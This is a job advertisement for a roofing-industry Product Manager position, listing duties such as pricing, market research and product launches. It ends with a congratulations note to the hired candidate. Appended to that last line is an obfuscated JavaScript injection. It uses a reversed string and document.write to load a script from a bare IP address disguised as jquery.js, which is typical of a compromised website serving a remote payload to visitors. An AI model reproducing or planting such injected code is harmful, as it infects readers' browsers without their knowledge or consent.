Industry : Roofing
Position : Product Manager
Salary : Up to RM 7k
• Develop product marketing strategies corresponding to customer and market needs.
• Collaborate with stakeholders and implement agreed strategies with the aim to achieve business unit top line sales and profitability targets.
• Manage innovation projects by identifying potential products, conducting market research, generating product requirements, determining specifications, production timetables, pricing, and time-integrated plans for product introduction.
• Provide comprehensive support to sales team on topics related to the product line.
• Determine customers’ needs and desires by specifying the research needed to obtain market information.
• Recommend the nature and scope of present and future product lines by reviewing product specifications and requirements; appraising new product development ideas and/or product or packaging changes.
• Assess market competition by comparing the company’s product to competitors’ products.
• Provide source data for product line communications by defining product marketing communication objectives.
• Obtain product market share by working with sales team to develop product sales strategies.
• Assess product market data by communicating with customers with sales team and evaluating research results.
• Provide information for management by preparing short-term and long-term product sales forecasts and special reports and analyses.
• Facilitate inventory turnover and product availability by reviewing and adjusting inventory levels and production schedules with supply chain team.
• Bring new innovation products to market by analysing proposed product requirements and product development programs; preparing return-on-investment analyses; leading product development projects and product launches through coordination and control of established time schedules with stakeholders (sales, industrial, finance, technical etc)
• Presenting new products in the framework of market launches or of a new product policy and exchanging information with the sales divisions as well as other relevant departments within the company.
• Determine product pricing by utilizing market research data; reviewing production and sales costs; anticipating volume; costing special and customized orders.
• Complete operational requirements and tasks related to the product line.
• Maintain professional and technical knowledge by attending educational workshops; reviewing professional publications; establishing personal networks; participating in professional societies.
• Maintain contacts with customers and suppliers, customers’ advisory board, opinion-formers, as well as technical and marketing specialists.
• Collaborate with internal functions to cross-functional activities and projects (product management, technical, sales, finance, purchasing etc).
• Monitor and report industry news and best practices.
• Engineering or Technical Degree
• 5 years related experience.
Congratulations to the well mannered, professional and experienced young man who has secured this position. Thanks to all others who have applied. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))